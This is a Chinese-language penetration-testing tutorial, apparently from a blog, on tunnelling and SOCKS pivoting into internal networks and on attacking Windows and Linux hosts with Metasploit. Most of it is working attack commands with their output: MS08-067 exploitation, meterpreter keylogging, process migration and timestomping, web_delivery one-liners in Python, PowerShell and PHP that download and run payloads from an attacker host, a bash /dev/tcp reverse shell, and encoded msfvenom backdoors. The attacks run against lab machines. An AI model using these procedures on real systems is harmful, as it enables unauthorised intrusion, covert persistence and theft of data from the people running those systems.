端口转发实现的是一对一的端口转发,而如果想更方面的渗透目标内网,则需要用到socks代理。下面是一些常用的工具。

 

Windows

0x01 Htran


步骤一
在外网服务器上执行命令
HTran.exe -p -listen 9001 9000
这个命令的意思是 监听两个端口,9001用来接收内网机器,9000连接sockscap的数据

步骤二
在内网机器执行命令
htran.exe -install //安装socket5服务
htran -start //启动
Htran.exe -p -slave 222.242.XXX.X 9001 127.0.0.1 8009
这个命令的意思是连接外网服务器,然后把数据转给内网机器的8009端口

IP 是服务器的IP ,9001是服务器监听的端口,127.0.0.1 本机IP 8009上本机反弹出去的端口
最终结果是内网机器8009–>外网机器9001–>本机scokscap使用9000端口连接外网机器

0x02 EarthWorm


使用方式与Linux相同

Linux

0x01 EarthWorm


EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。

1)正向socks v5服务器

[root@server120 tmp]# ./ew_for_linux64 -s ssocksd -l 8888
ssocksd 0.0.0.0:8888 <--[10000 usec]--> socks server

2)反弹socks v5服务器
公网VPS上

[root@server120 tmp]# ./ew_for_linux64 -s rcsocks -l 1080 -e 8888 
rcsocks 0.0.0.0:1080 <--[10000 usec]--> 0.0.0.0:8888
init cmd_server_for_rc here
start listen port here

内网肉鸡

[root@server144 tmp]# ./ew_for_linux64 -s rssocks -d 192.168.192.120 -e 8888 
rssocks 192.168.192.120:8888 <--[10000 usec]--> socks server

公网VPS上可以看到rssocks cmd_socket OK! 证明sock5代理服务建立成功了。

3)二级网络环境(一)
A和B两台主机控制权,A主机有公网IP,仅能连接内网B,B可以访问内网资源,但无法访问外网。
B上执行:

[root@server144 tmp]# ./ew_for_linux64 -s ssocksd -l 8888
ssocksd 0.0.0.0:8888 <--[10000 usec]--> socks server

A上执行(这里用到了端口转发功能):

[root@server120 tmp]# ./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.192.144 -g 8888
lcx_tran 0.0.0.0:1080 <--[10000 usec]--> 192.168.192.144:8888

外网可以连接A机器1080端口使用在B主机架设的socks5代理。

4)二级网络环境(二)
A和B两台主机控制权,A主机没有公网IP,也无法访问内网资源。B主机可以访问内网资源,但无法访问外网。
公网VPS:

[root@168368 ~]# ./ew -s lcx_listen -l 10800 -e 888
rcsocks 0.0.0.0:10800 <--[10000 usec]--> 0.0.0.0:888
init cmd_server_for_rc here
start listen port here

将10800端口收到的代理请求转交给888端口

A:

[root@server120 tmp]# ./ew_for_linux64 -s lcx_slave -d 198.98.112.112 -e 888 -f 192.168.192.144 -g 8888
lcx_slave 198.98.112.112:888 <--[10000 usec]--> 192.168.192.144:8888

B:

[root@server144 tmp]# ./ew_for_linux64 -s ssocksd -l 8888
ssocksd 0.0.0.0:8888 <--[10000 usec]--> socks server

然后就可以访问公网VPS10800端口使用sock5代理。

0x02 sSocks


sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.13,可在以下链接处下载。
http://sourceforge.net/projects/ssocks/
下载解压后,执行命令编译。
./configure && make
编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:
程序 功能

nsocks 类似通过Socks5代理后的netcat,可用来测试socks server
ssocksd 用来开启Socks5代理服务
ssocks 本地启用Socks5服务,并反弹到另一IP地址
rcsocks 接收反弹过来的Socks5服务,并转向另一端口

1)测试机在kali上起监听

root@kali:~/ssocks-0.0.14/src# ./rcsocks -l 1088 -p 1080 -vv
server: set listening client socks relay ...
server: port 1080 open
server: listening on 0.0.0.0:1080
server: set server relay ...
server: port 1088 open
server: listening on 0.0.0.0:1088

等待远程Socks5服务器访问本地1080端口,创建端口1080与本地端口1088的连接通道
2)肉鸡开启Socks5代理服务,反弹

[root@CentOS src]# ./rssocks -vv -s 10.11.100.99:1080

可以看到连接通道建立

123

0x03 reGeorg


老外的开源应用
https://github.com/sensepost/reGeorg
reGeorg是reDuh的继承者。主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
在github上下载reGeorg的压缩包,然后本地安装完urllib3,就可以运行reGeorg了。

先将reGeorg的对应脚本上传到服务器端,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常。
上传对应语言版本的tunnel文件到服务器上。然后本地访问上传的源文件,即可在本地与远程主机上形成一个http的回路。命令如下:
python reGeorgSocksProxy.py -p 6666 -u http://目标站点/tunnel.jsp //端口随便指定,只要不与本机开放端口冲突即可

0x04 metasploit


需要先添加目标内网网段路由

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

或者可以在meterpreter中直接添加路由

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

使用auxiliary/server/socks4a模块

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

0x05 SSH
通过下面的命令我们可以建立一个通过123.123.123.123的SOCKS服务器。

1.ssh -N -f -D 1080 123.123.123.123 # 将端口绑定在127.0.0.1上
2.ssh -N -f -D 0.0.0.0:1080 123.123.123.123 # 将端口绑定在0.0.0.0上

内网漫游

Windows:
proxifier、SocksCap
Linux:
proxychains

注意

ICMP无法代理,所以在使用nmap扫描的时候需要使用-Pn参数
必须使用-sT;如果使用-sS,端口状态会显示为filtered。
所以正确的nmap命令应该是:

root@kali:~# proxychains nmap 10.10.10.2 -T4 -sT

 

一、数据库连接配置
1)开启服务
service postgresql start
查看端口5432
root@kali-vincent:~# netstat -anlp | grep post
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 25851/postgres
2)进入postgresql配置
sudo -u postgres psql
alter user postgres with password ‘admin’;
3)修改linux系统的postgres用户的密码(密码与数据库用户postgres的密码相同)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
4)管理PostgreSQL用户和数据库
root@kali:~# psql -U postgres -h 127.0.0.1
postgres=# create user msf with password ‘admin’ nocreatedb;
CREATE ROLE

postgres=# create database msf with owner=msf;
CREATE DATABASE
postgres=# \q
5)msf配置连接
root@kali:~# msfconsole
msf > db_status
[*] postgresql selected, no connection
msf > db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background…
msf > db_status
[*] postgresql connected to msf
msf >
db_connect -y /usr/share/metasploit-framework/config/database.yml
6)配置自动连接
修改/usr/share/metasploit-framework/config/database.yml
development: &pgsql
adapter: postgresql
database: msf
username: msf
password: admin
host: localhost
port: 5432
pool: 5
timeout: 5
输入db_status验证一下数据库连接
msf > db_status
[*] postgresql connected to msf

二、扫描入库
在msfconsole中使用db_nmap命令启动扫描,可以将结果自动存储在数据库中。
msf > db_nmap -sS -A 172.16.100.134
查看扫描结果
msf > services
[-] The db_services command is DEPRECATED
[-] Use services instead

Services
========

host port proto name state info
—- —- —– —- —– —-
172.16.100.134 22 tcp ssh open OpenSSH 5.3 protocol 2.0
172.16.100.134 23 tcp telnet open
172.16.100.134 80 tcp http open Apache httpd 2.2.15 (CentOS)
172.16.100.134 111 tcp rpcbind open 2-4 RPC #100000
172.16.100.134 873 tcp rsync open protocol version 30
172.16.100.134 2222 tcp tcpwrapped open
查看数据库中的目标信息
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
172.16.100.134 00:0c:29:b0:78:39 Linux 2.6.X server
可以使用hosts -d ip来删除IP
查看msf版本
msf > version
Framework: 4.11.4-2015071403
Console : 4.11.4-2015071403.15168
4.5以前的版本已经移除了db_autopwn自动化攻击。下载
http://download.csdn.net/download/terrying/5063334
放到/usr/share/metasploit-framework/plugins下。
db_autopwn -t -p -e(自动工具所有的ip)
msf > db_autopwn -t -p -e
然后可以看到获得了meterpreter
[*] Meterpreter session 3 opened (172.16.100.128:55153 -> 172.16.100.166:10413) at 2016-07-02 11:10:23 +0800

1)MS08-067描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta。
2)漏洞利用
测试环境:Windows 2000
先使用nmap扫描一下:
C:\Users\dell>nmap -sS -A –script=smb-check-vulns –script-args=unsafe=1 -P0 172.16.100.166
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
可以看到提示MS08-067: VULNERABLE
然后使用metasploit
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.100.166
rhost => 172.16.100.166
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.100.128:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (885806 bytes) to 172.16.100.166
[*] Meterpreter session 2 opened (172.16.100.128:4444 -> 172.16.100.166:1030) at 2016-06-29 09:46:54 +0800

meterpreter >

基本命令:
background # 让meterpreter处于后台模式
sessions -i number # 与会话进行交互,number表示第n个session
quit # 退出会话
shell # 获得命令行

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

 

cat c:\\boot.ini # 查看文件内容
getwd # 查看当前工作目录 work directory
upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上
download 0xfa.txt /root/Desktop/ # 下载文件到本机上
edit c:\\boot.ini # 编辑文件
search -d d:\\www -f web.config # search 文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数为pid的进程中

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
getsystem #提权操作
timestompc:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间

键盘记录:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

端口转发:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

然后查看本地监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

内网渗透pivot:

是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境。
在Windows2003虚拟机上新建一块网卡,然后选择主机模式,配置不同网段10.11.100.1,kali是访问不了这个网段的。

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

或者可以在meterpreter中直接添加路由

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

这时候就可以使用其他的模块对内网进行渗透了,但是如果想要其他的应用可以访问到内网,这里使用auxiliary/server/socks4a模块,需要注意Proxychains不支持ICMP,所以在代理使用NMAP的时候需要使用 -sT -Pn参数。

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

然后看一下端口监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
添加socks4 127.0.0.1 1080

然后使用proxychains nmap -sS -v 10.11.100.1就可以对内网进行扫描了

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671

msfvenom命令行选项如下:

Options:

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload,可以用“>”号代替 
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/linux/osx/android和不同的编程语言python/php等。
root@kali:~# msfvenom -l payloads

查看支持编码
root@kali:~# msfvenom -l encoders
如果你使用了-b选项(设定了规避字符集),会自动调用编码器。
其他情况下,你需要使用-e选项来使用编码模块,例如:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
也可以使用-i选项进行多次编码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

下面演示一些用法:
Kali:172.16.100.182
测试机:172.16.100.155

PHP利用msfvenom生成后门


查看下php相关payload

msfvenom -l payloads | grep php

这里我们用bind_php来测试

php/bind_php Listen for a connection and spawn a command shell via php

查看配置项

root@kali:~# msfvenom -p php/bind_php --payload-options

生成后门

msfvenom -p php/bind_php RHOST=172.16.100.155 R

去掉开头的/*
访问http://172.16.100.155/1.php查看监听

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

 

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

 

升级为Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

JAVA利用msfvenom生成后门


查看下可以使用的payload

msfvenom -l payloads | grep java

这里我们使用

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

访问后获取反弹shell

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Windows利用msfvenom生成后门


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

本地监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Windows生成powershell后门


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

然后Windows下运行powershell -file “test.ps1”

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

参考文章
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm